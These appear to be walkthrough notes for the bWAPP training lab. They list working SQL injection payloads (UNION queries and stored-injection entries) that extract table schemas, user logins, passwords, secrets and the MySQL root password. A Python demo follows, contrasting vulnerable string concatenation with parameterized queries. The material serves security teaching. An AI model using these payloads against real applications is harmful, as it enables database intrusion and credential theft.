SQL Injection (SQLite)
Get SQLite version
bWAPP/sqli_11.php?title=k' UNION SELECT 1,sqlite_version(),3,4,5,6-- &action=search
Get tables
bWAPP/sqli_11.php?title=k' UNION SELECT 1,tbl_name,3,4,5,6 from sqlite_master;-- &action=search
Get columns
For all tables: bWAPP/sqli_11.php?title=k' UNION SELECT 1,sql,3,4,5,6 from sqlite_master;-- &action=search
For table 'users': bWAPP/sqli_11.php?title=k' UNION SELECT 1,sql,3,4,5,6 from sqlite_master where tbl_name='users';-- &action=search
Get data
bWAPP/sqli_11.php?title=k' UNION SELECT 1,login,password,email,secret,6 from users;-- &action=search
SQL Injection - Stored (Blog)
Assume the SQL query is: INSERT USERS (content, user) VALUES ('msg', 'username')
Get current user: entry=aa',(select user()));-- &blog=add
Get root's password: entry=aa',(select password from mysql.user where user='root' limit 0,1));-- &blog=add
Get tables: entry=aa',(SELECT GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()));-- &blog=add
OR: entry=aa',(SELECT GROUP_CONCAT(table_name)as data FROM (select table_name from information_schema.tables where table_schema=database()) as total));-- &blog=add
Get columns: entry=aa',(SELECT GROUP_CONCAT(column_name) from information_schema.columns where table_schema=database() and table_name='users'));-- &blog=add
Get data: entry=aa',(SELECT GROUP_CONCAT(id,0x5c,login,0x5c,password,0x5c,email,0x5c,secret) as data FROM (select id,login,password,email,secret from users limit 1,1) as total));-- &blog=add
Note: using this form of the query makes LIMIT work, i.e. you can get every user's info by using the LIMIT clause.
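
Why both sections above work, and the fix, as an added example (not code from bWAPP or from these notes): a concatenated six-column search and a concatenated blog INSERT next to their parameterized forms, run against an in-memory SQLite database. The schema, function names and sample rows are constructed, and the stored payload uses sqlite_version() in place of the MySQL user() call because the demo database is SQLite.

```python
import sqlite3

def make_db():
    # Constructed sample schema; six columns to match the UNION payload on the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT,
                             genre TEXT, main_character TEXT, imdb TEXT);
        CREATE TABLE users  (id INTEGER, login TEXT, password TEXT, email TEXT, secret TEXT);
        CREATE TABLE blog   (content TEXT, user TEXT);
        INSERT INTO movies VALUES (1, 'Sample Movie', '2000', 'drama', 'X', 'tt0');
        INSERT INTO users  VALUES (1, 'alice', 'constructed-hash', 'a@example.test', 's3cret');
    """)
    return db

def search_vulnerable(db, title):
    # Input is concatenated into the statement, so a quote ends the string literal.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return db.execute(sql).fetchall()

def search_safe(db, title):
    # Bound parameter: the whole input is treated as data, never as SQL text.
    return db.execute("SELECT * FROM movies WHERE title LIKE ?",
                      ("%" + title + "%",)).fetchall()

def blog_add_vulnerable(db, entry, user):
    # Same flaw in an INSERT: the entry can close the literal and supply the next value.
    sql = "INSERT INTO blog (content, user) VALUES ('" + entry + "', '" + user + "')"
    db.execute(sql)

def blog_add_safe(db, entry, user):
    db.execute("INSERT INTO blog (content, user) VALUES (?, ?)", (entry, user))

# "Get tables" payload from the SQLite section of the page.
UNION_PAYLOAD = "k' UNION SELECT 1,tbl_name,3,4,5,6 from sqlite_master;-- "
# Shape of the stored payloads on the page, with sqlite_version() swapped in (assumption).
STORED_PAYLOAD = "aa',(select sqlite_version()));-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable search:", search_vulnerable(db, UNION_PAYLOAD))
    print("safe search:      ", search_safe(db, UNION_PAYLOAD))
    blog_add_vulnerable(db, STORED_PAYLOAD, "bee")
    blog_add_safe(db, STORED_PAYLOAD, "bee")
    for row in db.execute("SELECT content, user FROM blog"):
        print("blog row:", row)
```

With bound parameters the search returns no rows for the payload and the blog stores the payload text verbatim as content.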